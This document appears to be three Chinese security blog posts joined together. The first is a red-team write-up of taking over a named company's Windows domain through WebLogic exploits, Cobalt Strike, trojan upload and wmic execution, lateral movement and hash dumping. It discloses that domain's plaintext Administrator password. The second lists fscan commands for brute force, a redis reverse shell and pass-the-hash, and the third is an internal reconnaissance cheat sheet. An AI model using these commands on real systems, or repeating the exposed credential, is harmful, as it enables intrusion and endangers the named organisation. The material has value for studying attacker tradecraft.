目录 0x00前言 0x01外网打点 0x02上线CS 域信息收集 抓取hash 提权 0x03横向移动 IPC$横向 使用条件 SMB Beacon 使用条件 建立SMB Beacon监听 psexec_psh横向 域管上线 横向域控 0x04 总结 记一次平平无奇有手就行的幸运域控 0x00 前言 最近在学习内网渗透，很想找个机会练练手。正好团队接到红队评估的项目，于是便有了此文，没什么技术含量，师傅们轻点喷。 0x01外网打点 在外网打点的的时候，都是些小打小闹，没有拿到权限，很是苦恼，最后突然发现了这个站点，一下子坐了起来，直觉告诉我有戏 Ps: 这里自己总结了一些Weblogic常见漏洞 Weblogic12存在 Wls9-async漏洞和 XMLDecoder漏洞，这里直接利用漏洞利用工具验证，漏洞存在。 先简单看一下当前用户权限，当前为administrator权限 直接传个冰蝎上去看看 冰蝎连上去，内网信息收集一波 系统：Windows Server 2008 R2 Enterprise 域：berca.co.id 当前主机是一台Windows Server 2008的机子，那我们就可以抓到明文密码，并且存在域环境。 IPv4 Address. . . . . . . . . . . : 192.168.10.22     Primary Dns Suffix  . . . . . . . : berca.co.id   DNS Suffix Search List. . . . . . : berca.co.id   DNS Servers . . . . . . . . . . . : 192.168.15.187                          192.168.15.180        收集到这里，通过DNS服务器初步判断，192.168.15.180、192.168.15.187这两台就是域控机器，后面也证实这两台就是域控机器。 再看一下进程列表，看一下是否存在杀软，就很棒，居然没有杀软 查看域用户失败，提示权限不足 net user /domain   //查看域用户 默认共享开启 net share  //查看默认共享 0x02上线CS 后续想继续收集一些域信息，但是因为权限不足，所以干脆一不做二不休直接祭出内网大杀器CS，直接powershell一句话上线CS 域信息收集 内网存活主机扫描一波： net view /domain   //查询域 net view /domain:ROOT  //查询ROOT域内所有机器 net group "domain computers" /domain  //查询所有域成员计算机列表 大概看了下，有好几百台机子，还不错。 net time /domain  //查询主域 域服务器通常也会作为时间服务器，主域：\ADBHPSRV.berca.co.id net group "Domain Controllers" /domain  //查看域控列表 Nslookup -type=SRV _ldap._tcp  //查看域控主机名 得到两台域控的地址和主机名： 192.168.15.187 adbhpsrv.berca.co.id     192.168.15.180 adbhpsrv02.berca.co.id   net group "domain admins" /domain  //查询域管 域管还挺多，我们只要能拿到一个域管的权限，就可以在这个域内漫游了 net accounts /domain  //获取域密码信息 nltest /domain_trusts  获取域信任信息 抓取hash 在内网渗透中，很多横向移动的方法都需要先获取用户的密码或者Hash值才能进行，比如哈希传递攻击、票据传递等等。 因为目标机是windows server 2008，所以直接抓到了明文密码： 得到明文密码：Administrator/Psft24680!!@@62## 提权 因为当前是一个Administrator权限，当前主机补丁打得也比较少，所以这里尝试利用甜土豆提权到system，提权成功反弹回来一个system权限的会话 0x03横向移动 IPC$横向 IPC$ 是共享“命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。利用IPC$可以与目标主机建立一个连接，利用这个连接，可以实现远程登陆及对默认共享的访问、访问目标机器的文件，上传、下载，也可以在目标机器上运行命令等。 使用条件 • 管理员开启了默认共享 默认共享是为了方便管理员远程管理而默认开启的共享，我们通过IPC连接可以实现对这些默认共享的访问。可以通过net share命令查看，前期信息收集时，就已经查看过当前主机是开启了默认共享的。 • 139、445端口开启 IPC连接需要139或445端口来支持，我们可以通过139和445端口来实现对共享文件/打印机的访问，IPC$连接默认会走445端口，不通的话会走139端口，这两个端口都可以单独实现文件共享。 当前主机满足上述IPC的利用条件，所以先尝试做IPC连接，发现10.23可以连接成功 shell net use \\192.168.10.23\ipc$ "Psft24680!!@@62##" /user:"Administrator" 然后在本机传个马，copy过去 shell copy C:\Windows\Temp\ma.exe \\192.168.10.23\c$\Windows\Temp\ma.exe 之后利用wmic远程执行 shell wmic /node:192.168.10.23 /user:Administrator /password:Psft24680!!@@62## process call create "cmd.exe /c C:\Windows\Temp\ma.exe" 但是在我传过去之后机器久久未上线，远程获取进程发现也并无杀软，猜测目标机器不出网。 SMB Beacon SMB Beacon使用命名管道与父级Beacon进行通讯，当两个Beacons链接后，子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，常用来绕防火墙有奇效。 使用条件 • 具有SMB Beacon的主机必须接受端口445上的连接 • 只能链接由同一Cobalt Strike实例管理的Beacon 在域中，默认域用户是可以登录到除域控以外的所有主机。当我们得到其中一个域用户的账号密码，所以我们可以利用该域用户与其他主机建立IPC连接，然后让其他主机进行SMB Beacon上线，于是批量扫了下445开放的主机 这里扫到了10.23机器开放，前面IPC也是利用的它，这里试试用SMB Beacon让其上线。 建立SMB Beacon监听 首先创建一个SMB Beacon的监听 psexec_psh横向 建立好SMB Beacon监听，尝试进行横向，利用明文密码或者hash让机器上线SMB Beacon，这里利用的是psexec_psh 利用SMB Beacon成功上线后，后面就会有 ∞∞ 这个字符，这就是派生的SMB Beacon，之后再在这台机子抓hash 然后重复操作10.18、10.19 在横向18、19的时候发现了一个疑似域用户的，可以重复上面的IPC连接传马远程执行，或者用这个机子继续去smb横向 当我成功横向24的时候发现了一个域管用户sp_farm，并成功抓取到了明文密码 域管上线 1. 当抓到域管明文，可以直接利用CS的功能，切换用户上线 2. 如果没域管明文，可以查看当前机子是否有域管进程，注入域管进程上线 通过上述两种方式，都可以得到域管权限的回话 横向域控 有了域管权限，就可以直接横向域控了，前期的信息收集我们知道域控都在15段，我们当前所有拿到的机子都是10段的，所以这里利用了CS的另一个功能，我们可以自己添加目标机器，这里直接把域控的IP和主机名都添加上，操作系统写ukonw就可以了 添加好域管主机后，扫描了一下域控机器是否开放了445端口 发现都开放了445，之后就可以用域管权限的会话，或者域管权限的账户横向过去 横向成功，域控主机成功上线 然后导出域内hash，全部拿下 0x04 总结 内网渗透的思路、方法远远不止于此，本项目中用到的也只是很小的一部分，如果文中有错误，望大佬们斧正。   ...

================================== 免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。 0x01 工具介绍 一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 0x02 安装与使用 fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)fscan.exe -hf ip.txt (以文件导入)fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(wmiexec无回显命令执行) 0x03 项目链接下载 1.加巅峰阁QQ群，群文件下载 ...

渗透测试的本质是信息收集，我们可以将内网信息收集大致分为5个步骤，即本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。 最常见的两个问题就是： 我是谁？-- whoami我在哪？-- ipconfig/ifconfig 当获取一台主机的管理员权限的时候，我们总是迫不及待想要去深入了解一下。 本机信息收集 1.查询账户信息： 对当前主机的用户角色和用户权限做了解，判断是否需要进一步提升权限。 win：whoami、net user 用户名linux：whoami、id、cat /etc/shadow、cat /etc/passwd 2.查询网络和端口信息 根据目的主机的IP地址/网络连接/相关网络地址，确认所连接的网络情况。 win：ipconfig、netstat -ano ARP表：arp -a 路由表: route print 查看dns缓存记录命令：ipconfig/displaydns linux：ifconfig、netstat -anplt ARP表:arp -a / 路由表:route -n 查看登录日志获取登录来源ip 3.查询进程列表 查看本地运行的所有进程，确认本地软件运行情况，重点可以关注安全软件。 win：tasklist linux: ps、 top 4.查询系统和补丁信息 获取当前主机的系统版本和补丁更新情况，可用来辅助提升权限。 win：systeminfo，查询系统信息/补丁安装情况。 wmic qfe get Caption,description,HotfixID,installedOn //查询补丁信息，包含说明链接/补丁描述/KB编号/更新时间等信息 wmic qfe list full 查询全部信息 Linux: 通过查看内核版本 uname -a 或者使用rpm -qa来查询安装了哪些软件包 5.凭证收集 服务器端存有敏感信息，通过收集各种登录凭证以便扩大战果。 Windows：本地密码Hash和明文密码/抓取浏览器密码/服务端明文密码linux：history记录敏感操作/shadow文件破解/mimipenguin抓取密码/使用Strace收集登录凭证/全盘搜索敏感信息 域内信息收集 搜集完本机相关信息后，就需要判断当前主机是否在域内，如果在域内，就需要进一步收集域内信息 1.判断是否有域 一般域服务器都会同时作为时间服务器，所以使用下面命令判断主域 运行 net time /domain 该命令后，一般会有如下三种情况: 1.存在域，但当前用户不是域用户，提示说明权限不够 C:\Users>bypass>net time /domain 发生系统错误 5 拒绝访问。 2.存在域，并且当前用户是域用户 C:\Users\Administrator>net time /domain \\dc.test.com 的当前时间是 2020/10/23 21:18:37 命令成功完成。 3.当前网络环境为工作组，不存在域 C:\Users\Administrator>net time /domain 找不到域 WORKGROUP 的域控制器。 2.查找域管理员 net user /domain //获取域用户列表net group /domain //查询域内所有用户组列表net group “Domain Admins” /domain //查询域管理员用户net group "Domain Controllers" /domain //查看域控制器net localgroup administrators /domain //查询域内置本地管理员组用户 3.找到域控 一般来说，域控服务器IP地址为DNS服务器地址，找到DNS服务器地址就可以定位域控。 nslookup/ping 域名,解析到域控服务器IP地址 ...